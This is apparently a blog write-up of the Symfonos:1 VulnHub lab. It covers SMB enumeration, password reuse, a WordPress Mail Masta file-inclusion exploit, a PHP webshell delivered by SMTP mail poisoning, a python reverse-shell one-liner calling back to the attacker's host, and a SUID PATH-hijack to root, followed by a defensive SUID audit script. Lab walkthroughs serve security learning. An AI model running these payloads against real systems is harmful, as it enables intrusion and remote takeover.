
Hoping to learn together with everyone; if anything in this article is wrong, please point it out, thank you!

Personal blog: CH4SER的个人BLOG – Welcome To Ch4ser's Blog

Symfonos VM download: https://www.vulnhub.com/entry/symfonos-1,322/

0x01 Information gathering

An Nmap scan of the target shows ports 22, 25, 80, 139 and 445 open, running ssh, smtp, http and smb respectively. Two details worth keeping in mind: Postfix advertises VRFY, so user names could also be confirmed over SMTP, and Samba 4.5.16 on Debian 9 is the version that the share listing below will confirm.

┌──(root㉿ch4ser)-[~]
└─# nmap -p- -sV -sC -A 192.168.196.141
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-17 08:15 CST
Nmap scan report for 192.168.196.141
Host is up (0.00034s latency).
Not shown: 65530 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
|   256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
|_  256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Not valid before: 2019-06-29T00:29:42
|_Not valid after:  2029-06-26T00:29:42
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 00:0C:29:AA:38:6B (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Hosts:  symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

A dirsearch scan of the web root on port 80 turned up nothing of value.

Since the target exposes SMB, connecting with smbclient lists its shares. Sharename is the name of each share: print$ is the printer-driver share, helios is the personal share of user helios, anonymous is an anonymous share, and IPC$ is the IPC service share.

┌──(root㉿ch4ser)-[~]
└─# smbclient -L 192.168.196.141
Password for [WORKGROUP\root]:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        helios          Disk      Helios personal share
        anonymous       Disk      
        IPC$            IPC       IPC Service (Samba 4.5.16-Debian)
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            SYMFONOS

Try the anonymous share first, since a share named anonymous usually needs no credentials (just press Enter at the password prompt). It holds attention.txt; download it and read it: Zeus tells staff to stop using the passwords epidioko, qwerty and baseball, and the next person caught using one gets fired. So Zeus is evidently the boss, haha.

┌──(root㉿ch4ser)-[~]
└─# smbclient //192.168.196.141/anonymous
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jun 29 09:14:49 2019
  ..                                  D        0  Sat Jun 29 09:12:15 2019
  attention.txt                       N      154  Sat Jun 29 09:14:49 2019

                19994224 blocks of size 1024. 17305336 blocks available
smb: \> get attention.txt
getting file \attention.txt of size 154 as attention.txt (75.2 KiloBytes/sec) (average 75.2 KiloBytes/sec)
smb: \> exit

┌──(root㉿ch4ser)-[~]
└─# cat attention.txt
Can users please stop using passwords like epidioko, qwerty and baseball!
Next person I find using one of these passwords will be fired!

-Zeus

Next, connect to the helios personal share as user helios and try the three leaked passwords epidioko, qwerty and baseball; qwerty is the right one (smbclient also accepts -U 'helios%qwerty', so the three attempts can be scripted). todo.txt says the user is working on /h3l105, so /h3l105 is probably a directory on the website.

┌──(root㉿ch4ser)-[~]
└─# smbclient //192.168.196.141/helios -U helios
Password for [WORKGROUP\helios]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jun 29 08:32:05 2019
  ..                                  D        0  Sat Jun 29 08:37:04 2019
  research.txt                        A      432  Sat Jun 29 08:32:05 2019
  todo.txt                            A       52  Sat Jun 29 08:32:05 2019

                19994224 blocks of size 1024. 17305336 blocks available
smb: \> get research.txt
getting file \research.txt of size 432 as research.txt (210.9 KiloBytes/sec) (average 210.9 KiloBytes/sec)
smb: \> get todo.txt
getting file \todo.txt of size 52 as todo.txt (25.4 KiloBytes/sec) (average 118.2 KiloBytes/sec)
smb: \> exit

┌──(root㉿ch4ser)-[~]
└─# cat research.txt
Helios (also Helius) was the god of the Sun in Greek mythology. He was thought to ride a golden chariot which brought the Sun across the skies each day from the east (Ethiopia) to the west (Hesperides) while at night he did the return journey in leisurely fashion lounging in a golden cup. The god was famously the subject of the Colossus of Rhodes, the giant bronze statue considered one of the Seven Wonders of the Ancient World.

┌──(root㉿ch4ser)-[~]
└─# cat todo.txt
1. Binge watch Dexter
2. Dance
3. Work on /h3l105

Browsing to /h3l105 shows a WordPress site; Wappalyzer reports WordPress 5.2.2.

0x02 Getting a shell - WordPress arbitrary file inclusion

Scanning the WordPress site with wpscan shows the mail-masta plugin at version 1.0, which may be exploitable.

wpscan project: https://github.com/wpscanteam/wpscan

┌──(root㉿ch4ser)-[~]
└─# wpscan --url http://192.168.196.141/h3l105/ --plugins-detection aggressive
............
[+] mail-masta
 | Location: http://192.168.196.141/h3l105/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 | Readme: http://192.168.196.141/h3l105/wp-content/plugins/mail-masta/readme.txt
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.196.141/h3l105/wp-content/plugins/mail-masta/, status: 200
 |
 | Version: 1.0 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.196.141/h3l105/wp-content/plugins/mail-masta/readme.txt

Searching for mail-masta exploits with searchsploit and reading the hit gives this PoC:

http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

which on this target becomes:

/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

┌──(root㉿ch4ser)-[~]
└─# searchsploit masta
--------------------------------------------------------------- ---------------------------------
 Exploit Title                                                 |  Path
--------------------------------------------------------------- ---------------------------------
WordPress Plugin Mail Masta 1.0 - Local File Inclusion         | php/webapps/40290.txt
WordPress Plugin Mail Masta 1.0 - Local File Inclusion (2)     | php/webapps/50226.py
WordPress Plugin Mail Masta 1.0 - SQL Injection                | php/webapps/41438.txt
--------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(root㉿ch4ser)-[~]
└─# find / -name 40290.txt
/root/40290.txt
/usr/share/exploitdb/exploits/php/webapps/40290.txt

┌──(root㉿ch4ser)-[~]
└─# cat /usr/share/exploitdb/exploits/php/webapps/40290.txt
[+] Date: [23-8-2016]
[+] Autor Guillermo Garcia Marcos
[+] Vendor: https://downloads.wordpress.org/plugin/mail-masta.zip
[+] Title: Mail Masta WP Local File Inclusion
[+] info: Local File Inclusion

The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.

Source: /inc/campaign/count_of_send.php Line 4: include($_GET['pl']);
Source: /inc/lists/csvexport.php: Line 5: include($_GET['pl']);
Source: /inc/campaign/count_of_send.php Line 4: include($_GET['pl']);
Source: /inc/lists/csvexport.php Line 5: include($_GET['pl']);
Source: /inc/campaign/count_of_send.php Line 4: include($_GET['pl']);

This looks as a perfect place to try for LFI. If an attacker is lucky enough, and instead of selecting the appropriate page from the array by its name, the script directly includes the input parameter, it is possible to include arbitrary files on the server.

Typical proof-of-concept would be to load passwd file:

http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

The page returns the contents of /etc/passwd, which confirms the arbitrary file inclusion.

Next, try to include a webshell. With no upload point, the usual route is log poisoning: request a URL that carries a PHP one-liner so it lands in the access log, then include the log. That is not used here. Recon showed the target runs an SMTP service, so instead send user helios a mail containing the one-liner and include the default mailbox /var/mail/helios, where Postfix appends locally delivered mail.

┌──(root㉿ch4ser)-[~]
└─# telnet 192.168.196.141 25
Trying 192.168.196.141...
Connected to 192.168.196.141.
Escape character is '^]'.
220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
MAIL FROM: Ch4ser
250 2.1.0 Ok
RCPT TO: helios
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
<?php system($_GET['shell']); ?>
.
250 2.0.0 Ok: queued as C4C0840698
QUIT
221 2.0.0 Bye
Connection closed by foreign host.

Requesting the following path shows that the mail has been written into the mailbox. The webshell code itself is absent from the output, which is expected: include() executes the <?php ... ?> block and only prints the rest of the mailbox.

/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios

Now all that is left is a reverse shell to get a session. In my testing a bash reverse shell did not connect back, but a python one did.

Reverse shell generator: https://forum.ywhack.com/shell.php

192.168.196.141/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&shell=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.196.128",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

(The browser URL-encodes the quotes, spaces and parentheses in the shell parameter for you; when sending this with curl, encode it yourself, e.g. with -G --data-urlencode.)

This yields a shell as the ordinary user helios. Note that the shell is helios rather than www-data: PHP on this box runs as helios, which is also why it could read helios's mailbox in the first place.

┌──(root㉿ch4ser)-[~]
└─# nc -lvvp 7777
listening on [any] 7777 ...
192.168.196.141: inverse host lookup failed: Unknown host
connect to [192.168.196.128] from (UNKNOWN) [192.168.196.141] 52208
/bin/sh: 0: can't access tty; job control turned off
$ whoami
helios
$ id
uid=1000(helios) gid=1000(helios) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

0x03 Privilege escalation - SUID binary and the PATH environment variable

Searching for SUID files turns up /opt/statuscheck, which may be usable, but that depends on whether it executes commands.

$ python -c 'import pty;pty.spawn("/bin/bash")'
h3l105/wp-content/plugins/mail-masta/inc/campaign$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/opt/statuscheck
/bin/mount
/bin/umount
/bin/su
/bin/ping

A quick look at /opt/statuscheck with strings shows that it runs a curl command, and it does so by bare name rather than by absolute path, so curl is resolved through the caller's PATH.

h3l105/wp-content/plugins/mail-masta/inc/campaign$ strings /opt/statuscheck
...........
curl -I H
...........
Go to /tmp, create a file named curl whose content runs /bin/sh, make it executable, and prepend /tmp to PATH.

h3l105/wp-content/plugins/mail-masta/inc/campaign$ cd /tmp
helios@symfonos:/tmp$ echo "/bin/sh" > curl
helios@symfonos:/tmp$ chmod 777 curl
helios@symfonos:/tmp$ export PATH=/tmp:$PATH
helios@symfonos:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Run /opt/statuscheck. Because it is SUID root, it executes our /tmp/curl with root privileges, and that in turn starts /bin/sh. Note the id output: uid is still 1000 (helios) and only euid is 0 (root). /bin/sh (dash on Debian) keeps that effective uid; bash would drop it on startup unless invoked with -p. Either way, root and the flag follow.

helios@symfonos:/tmp$ /opt/statuscheck
# whoami
root
# id
uid=1000(helios) gid=1000(helios) euid=0(root) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
# cd /root
# ls
proof.txt
# cat proof.txt
Congrats on rooting symfonos:1!
(ASCII art omitted)
Contact me via Twitter @zayotic to give feedback!
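The 0x03 step generalised: an added example (not from the write-up) that does what strings /opt/statuscheck did by hand, for every SUID binary it can find. It extracts printable strings and flags any that invoke a common command by bare name, since a set-uid program that calls system("curl ...") resolves curl through the caller's PATH, which is exactly the weakness abused above. The WATCH list is a hand-picked assumption and SAMPLE_BINARY is a constructed stand-in for /opt/statuscheck, not the real file.

```python
#!/usr/bin/env python3
"""Flag PATH-dependent command strings inside SUID binaries (added example)."""
import os
import re
import stat
import string

# Printable bytes as strings(1) sees them: letters, digits, punctuation, space.
PRINTABLE = set(string.printable) - set("\t\n\r\x0b\x0c")
# "cmd arg ..." where cmd has no directory component.
COMMAND = re.compile(r"^([a-z][a-z0-9_.+-]*)(?:\s+\S.*)?$")
# Commands a SUID helper commonly shells out to; a bare name here is suspect
# (assumption: extend for the target at hand).
WATCH = {"curl", "wget", "sh", "bash", "cat", "ls", "cp", "mv", "rm", "ps",
         "tar", "service", "systemctl", "netstat", "ifconfig", "ip", "mail"}


def extract_strings(blob: bytes, min_len: int = 4) -> list:
    """Runs of at least min_len printable bytes, like strings(1)."""
    out, cur = [], []
    for b in blob:
        ch = chr(b)
        if ch in PRINTABLE:
            cur.append(ch)
        else:
            if len(cur) >= min_len:
                out.append("".join(cur))
            cur = []
    if len(cur) >= min_len:
        out.append("".join(cur))
    return out


def path_dependent_commands(strings: list) -> list:
    """Strings that invoke a watched command without an absolute path."""
    hits = []
    for s in strings:
        m = COMMAND.match(s.strip())
        if m and m.group(1) in WATCH:
            hits.append(s.strip())
    return hits


def audit_blob(blob: bytes) -> list:
    return path_dependent_commands(extract_strings(blob))


def audit(path: str) -> list:
    with open(path, "rb") as f:
        return audit_blob(f.read())


def is_suid(path: str) -> bool:
    """Regular file with the set-uid bit; missing files are simply not SUID."""
    try:
        st = os.lstat(path)
    except OSError:
        return False
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_ISUID)


def find_suid(roots=("/usr", "/bin", "/sbin", "/opt")) -> list:
    """Python equivalent of: find <roots> -perm -u=s -type f."""
    found = []
    for root in roots:
        for d, _, files in os.walk(root):
            for name in files:
                p = os.path.join(d, name)
                if is_suid(p):
                    found.append(p)
    return found


# Constructed stand-in for /opt/statuscheck: an ELF-looking prefix, the
# "curl -I H" format string the write-up found, one absolute-path command
# that must not be flagged, and a second bare command.
SAMPLE_BINARY = (b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8
                 + b"curl -I H\x00" + b"/usr/bin/id\x00" + b"\x90" * 5 + b"ls -la\x00")

if __name__ == "__main__":
    for p in find_suid():
        hits = audit(p)
        if hits:
            print(f"{p}: {hits}")
```

The script needs Python 3.9 or later; on an old target like this one, copy the binary to the attacker box and call audit() there. A hit is only a candidate: confirm it with the /tmp/curl trick as above, or by reading the call in a disassembler. The fix for the binary is an absolute path (or execve with a fixed environment) and dropping the caller's PATH before any system()/popen() call.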